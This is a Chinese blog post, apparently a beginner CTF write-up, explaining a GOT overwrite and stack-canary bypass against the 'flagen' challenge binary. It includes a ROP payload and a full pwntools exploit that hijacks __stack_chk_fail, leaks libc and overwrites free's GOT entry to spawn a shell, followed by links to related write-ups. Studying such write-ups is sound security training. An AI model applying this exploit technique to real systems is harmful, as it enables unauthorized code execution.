PNW入门之got表覆写

最新推荐文章于 2022-04-24 21:15:47 发布
最新推荐文章于 2022-04-24 21:15:47 发布
阅读量3.3k 收藏 11
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681716/article/details/89876653
版权

实验目的

通过本次实验掌握got表的覆写和如何绕过canary。
本次实验以flagen文件为例。

实验文件

链接:https://pan.baidu.com/s/1ZSX-4AHSbJH1kGIncHjvbA
提取码:eh2k

实验步骤

首先介绍一下got表覆写的原理:
在这里插入图片描述
GOT表:
概念:每一个外部定义的符号在全局偏移表(Global offset Table )中有相应的条目,GOT位于ELF的数据段中,叫做GOT段。
作用:把位置无关的地址计算重定位到一个绝对地址。程序首次调用某个库函数时,运行时连接编辑器找到相应的符号,并将它重定位到GOT之后每次调用这个函数都会将控制权直接转向那个位置,而不再调用编辑器。

对文件的保护机制进行检测:
在这里插入图片描述
我们通过对文件的保护进行检测可以看到,这是一个32位ELF程序,RELRO为” Partial RELRO”,说明我们对GOT表具有写权限,Stack为”Canary found”说明程序启用了栈保护,NX Enabled说明开启了数据执行保护(DEP),我们很难通过shellcode来执行代码了,No PIE说明未采用地址空间随机化。
从Canary的工作机制,我总结出绕过Canary保护的方法有:
1、泄露canary。由于Canary保护仅仅是检查canary是否被改写,而不会检查其他栈内容,因此如果攻击者能够泄露出canary的值,便可以在构造攻击负载时填充正确的canary,从而绕过canary检查,达到实施攻击的目的。
2、劫持__stack_chk_fail。当canary被改写时,程序执行流会走到__stack_chk_fail函数,如果攻击者可以劫持该函数,便能够改变程序的执行逻辑,执行攻击者构造的代码。我们知道,Linux采用的是延迟绑定技术(PLT),如果我们能够修改全局偏移表(GOT)中存储的__stack_chk_fail函数地址,便可以在触发canary检查失败时,跳转到指定的地址继续执行。
对文件进行静态分析:
在这里插入图片描述
所以,我们对于该题,我们的漏洞利用策略是绕过Canary保护,并劫持Libc中的__stack_chk_fail来改变程序执行流,由于程序开启了NX,我们需要构造ROP链来执行我们的代码。

在这里插入图片描述
通过分析这段代码,我们可以发现这段代码的功能是将你输入的内容变长。那么,在这里就会存在栈溢出。
所以我们可以编写我们的payload:

payload=p32(ret)+'h'*0x55+'a'*8+'a'*5+p32(pop_1)+p32(stack_check)
payload+=p32(puts)+p32(pop_1)+p32(elf.got['free'])
payload+=p32(read)+p32(pop_3)+p32(bss+0x100)+p32(0x6fffffff)+p32(0xffffffff)
payload+=p32(read)+p32(pop_3)+p32(elf.got['free'])+p32(0x6fffffff)+p32(0xffffffff)
payload+=p32(elf.plt['free'])+p32(pop_1)+p32(bss+0x100)

我们还需要注意的就是payload中会有\x00截断,所以我们需要找到一个合适的输入函数。使用文件中自己编写的输入函数,覆盖参数(注意\x00截断)。

在这里插入图片描述
最后还是通过泄露出libc的基址来进行getshell。

libc=LibcSearcher('alarm',alarm)
system=alarm-libc.dump('alarm')+libc.dump('system')
malloc_hook=alarm-libc.dump('alarm')+libc.dump('__malloc_hook')
print('malloc_hook',hex(malloc_hook))
p.sendline('/bin/sh\x00')
p.sendline(p32(system))

getshell:

在这里插入图片描述
最后附上exp.py

from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']
elf=ELF('./flagen')
def input(p,input):
    p.sendlineafter(': ','1')
    p.sendline(input)
def up(p):
    p.sendlineafter(': ','2')
def low(p):
    p.sendlineafter(': ','3')
def change(p):
    p.sendlineafter(': ','4')
def addprefix(p):
    p.sendlineafter(': ','5')
def prin(p):
    p.sendlineafter(': ','6')
def exit(p):
    p.sendlineafter(': ','7')
puts=0x08048510
ret=0x0804846a
stack_check=0x0804B01C
pop_1=0x08048481
pop_2=0x08048b00
pop_3=0x08048d8d
bss=0x804b144+0x8
a=0x08048F60
read=0x080486CB
p=process('./flagen')
payload=p32(ret)+'h'*0x55+'a'*8+'a'*5+p32(pop_1)+p32(stack_check)
payload+=p32(puts)+p32(pop_1)+p32(elf.got['free'])
payload+=p32(read)+p32(pop_3)+p32(bss+0x100)+p32(0x6fffffff)+p32(0xffffffff)
payload+=p32(read)+p32(pop_3)+p32(elf.got['free'])+p32(0x6fffffff)+p32(0xffffffff)
payload+=p32(elf.plt['free'])+p32(pop_1)+p32(bss+0x100)
input(p,payload)
change(p)
alarm=u32(p.recv()[4:8].ljust(4,'\x00'))
libc=LibcSearcher('alarm',alarm)
system=alarm-libc.dump('alarm')+libc.dump('system')
malloc_hook=alarm-libc.dump('alarm')+libc.dump('__malloc_hook')
print('malloc_hook',hex(malloc_hook))
p.sendline('/bin/sh\x00')
p.sendline(p32(system))
p.interactive()
p.close()
Han&Joe
关注
pwn 练习笔记 暑假的第二天 got覆盖
SsMing的博客
07-14 2533
pwnable passcode1.ssh连上去看源码:#include <stdio.h>#include <stdlib.h>void login(){    int passcode1;    int passcode2;    printf("enter passcode1 : ");    scanf("%d", passcode1);    fflush(std...
GOT表覆写技术
zszcr的博客
03-22 4639
GOT:概念:每一个外部定义的符号在全局偏移(Global offset Table)中有相应的条目,GOT位于ELF的数据段中,叫做GOT段。作用:把位置无关的地址计算重定位到一个绝对地址。程序首次调用某个库函数时,运行时连接编辑器(rtld)找到相应的符号,并将它重定位到GOT之后每次调用这个函数都会将控制权直接转向那个位置,而不再调用rtld。PLT:过程连接(Procedure L...
PNW入门got表覆写-附件资源
03-05
PNW入门got表覆写-附件资源
漏洞利用-GOT覆写技术
helloworlddm的博客
06-25 1571
GOT和PLT GOT: 概念:每一个外部定义的符号在全局偏移(Global offset Table)中有相应的条目,GOT位于ELF的数据段中,叫做GOT段。 作用:把位置无关的地址计算重定位到一个绝对地址。程序首次调用某个库函数时,运行时连接编辑器(rtld)找到相应的符号,并将它重定位到GOT之后每次调用这个函数都会将控制权直接转向那个位置,而不再调用rtld。 PLT: 过程连接(Procedure Linkage Table),一个PLT条目对应一个GOT条目 当main()函数开始,会
GOT 覆写技术浅析与实际应用
个人笔记
02-12 1417
0x10 前置知识 0x11 GOT与PLT基本概念 GOT(Global Offset Table),即全局偏移,存放的是每一个外部符号的地址。我们知道,对于动态链接,程序只有在运行的时候,才会链接到外部的函数库或者变量,而GOT的作用就在于,为每个程序找到他们链接的外部符号的地址。GOT 位于数据段(.data)中,一般将其单独称为.got 段。 专业术语:把位置无关的地址计算重定位到一个绝...
pwnable 笔记 Toddler's Bottle - passcode GOT表覆写攻击技术
木槿华年的博客
10-15 267
https://blog.csdn.net/SmalOSnail/article/details/53247502
javascript 方法覆写实例代码
10-30
知识点一:JavaScript中的方法覆写 在JavaScript中,方法覆写是一个常见的概念,它指的是在子类或者函数作用域中重新定义一个与父类或者外部作用域中同名的方法,以实现特定的功能。方法覆写通常用于实现多态性,即...
Java的覆写操作实例分析
08-25
在Java中,属性覆写是指子类定义和父类定义之中名称相同的属性。例如,在上面的实例中,我们定义了一个名为Book的父类,它有一个名为info的属性,而在子类ComputerBook中,我们也定义了一个名为info的属性。这样,在...
[BUUCTF]PWN——inndy_echo(32位fmt修改got
mcmuyanga的博客
02-01 889
inndy_echo 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下,看看大概的情况,已经看到存在格式化字符串漏洞了,而且还是可以一直输入的哪种 32位ida载入 看到程序里存在格式化字符串漏洞,而且有system函数,想到的是将printf@got修改为system@plt,由于一开始system没用执行,所以got里的地址不对,得用plt里的。然后传入bin/sh即可 pwntools集成了一个很强的工具,我们可以通过它快速修改对应的值, 命令格式: fmts
PWN入门之libc
weixin_44681716的博客
03-24 2745
这次的实验的前提的我们不知道system和bin/sh的函数,然后通过泄露某个函数在libc中的地址,再加上这几个函数的偏移量来计算system和bin/sh的地址,最后将这个地址覆盖到ret上,以便能跳至我们想要的函数,最终获得shellcode 我们还是以pwn举例 1、 ...
Pwn_11 Got 劫持
weixin_30822451的博客
03-08 443
比如说 把puts(str)的.got.plt的地址的值改为system函数地址 格式化字符串的综合利用 可以使用任意地址读取,获取当前函数的实际地址,从而可以获得libc的基地址 利用libc基地址+偏移地址 可以知道其他函数地址 利用任意地址写入,从而配合got hijacking更改已有函数地址   from pwn import *r = remote('127.0....
open和closed_劫持got绕过disable_functions
weixin_39559559的博客
11-24 788
最近阅读了芝士狍子糕师傅写的针对宝塔的RASP及其disable_functions的绕过的文章。觉得其中劫持got来绕过disable_functions的方法还是比较有意思的,对于web手来说也是比较好理解的。这里通过web手的视角来理解这种绕过disable_functions的方法。前置知识/proc目录Linux系统上的/proc目录是一种文件系统,即proc文件系统。/pr...
地址随机化 linux,GOT覆盖和Linux地址随机化
weixin_36414025的博客
05-13 348
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?原理由于GOT是可写的,把其中的函数地址覆盖为我们shellcode地址,在程序进行调用这个函数时就会执行shellcode。GOT:概念:每一个外部定义的符号在全局偏移(Global offset Table )中有相应的条目,GOT位于ELF的数据段中,叫做GOT段。作用:把位置无关的地址计算重定位到一个绝对地...
Pwn 学习 plt和got
MrTreebook的博客
04-24 758
目录1.简介plt和gotpltGOT2.保护机制3.执行顺序 1.简介plt和got plt PLT : 程序链接(PLT,Procedure Link Table) GOT GOT : 全局偏移GOT, Global Offset Table) 此处不对概念做解释了 可以点击查看大佬的介绍 在此我以初学者的角度认识plt和got 点击跳转 点击跳转 2.保护机制 开启RELRO 在前面描述的漏洞攻击中曾多次引入了GOT覆盖方法,GOT覆盖之所以能成功是因为默认编译的应用程序的重定
0ctf flagen writeup
ling
04-12 1997
溢出点: 在leetify的处理中,程序将h转化为1-1,一个字符变成了三个字符。但是空间没有增加,存在栈溢出。 利用: 程序有栈canary保护,最开始想着找方法泄露出canary。看栈上有残留的canary存在,然后就使劲找泄露方法,奈何所有的处理函数中,字符串的末尾都添加上了\x00,因此没办法泄露。 后来考虑栈溢出能覆盖些什么。栈canary、返回值、函数参数。函数的参数刚
scanf忘记加'&'危害有多大? 详解GOT表覆写攻击技术
HiTaQini
11-20 8739
初学C语言时,大家有没有遇到过这样的情景? 在使用`scanf()`函数时,忘记加取地址符号`&`. 结果程序报错,debug了半天,恍然发现,原来是忘记加坑爹的`&`。 本文通过讲解一道pwnable.kr上的got表覆写题目,详细的解读GOT覆写技术,讲一讲`scanf`不加`&`到底有多坑。
GOT和PLT知识详解
热门推荐
qq_18661257的专栏
01-23 3万+
GOTGOT和PLTPLT在程序中的作用非常巨大,接下来的讲解希望大家可以仔细看看我们用一个非常简单的例子来讲解,代码如下: 图1然后我们编译我们直接gdb./a.outgdb ./a.out来进行反编译处理,然后通过disasmaindisas main查看mainmain函数中的反编译代码如下:图3我们可以观察到gets@pltgets@plt和puts@pltputs@plt这两个函数,
ELF 文件中的 GOT 和 PLT 解读
我的专栏
12-01 9831
ELF可以生成一种特殊的代码——与位置无关的代码(position-independent code,PIC)。用户对gcc使用-fPIC指示GNU编译系统生成PIC代码。它是实现共享库或共享可执行代码的基础.这种代码的特殊性在于它可以加载到内存地址空间的任何地址执行.这也是加载器可以很方便的在进程中动态链接共享库。     PIC的实现运用了一个事实,就是代码段中任何指令和数据段中的任何变量之
覆写Validated
最新发布
09-02
覆写Validated是指对一个已经验证的实体或数据进行修改或更新。在编程中,通常会使用函数、方法或类来实现这一操作。 例如,假设有一个名为`validateName`的函数,用于验证用户输入的姓名是否合法。要覆写这个函数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值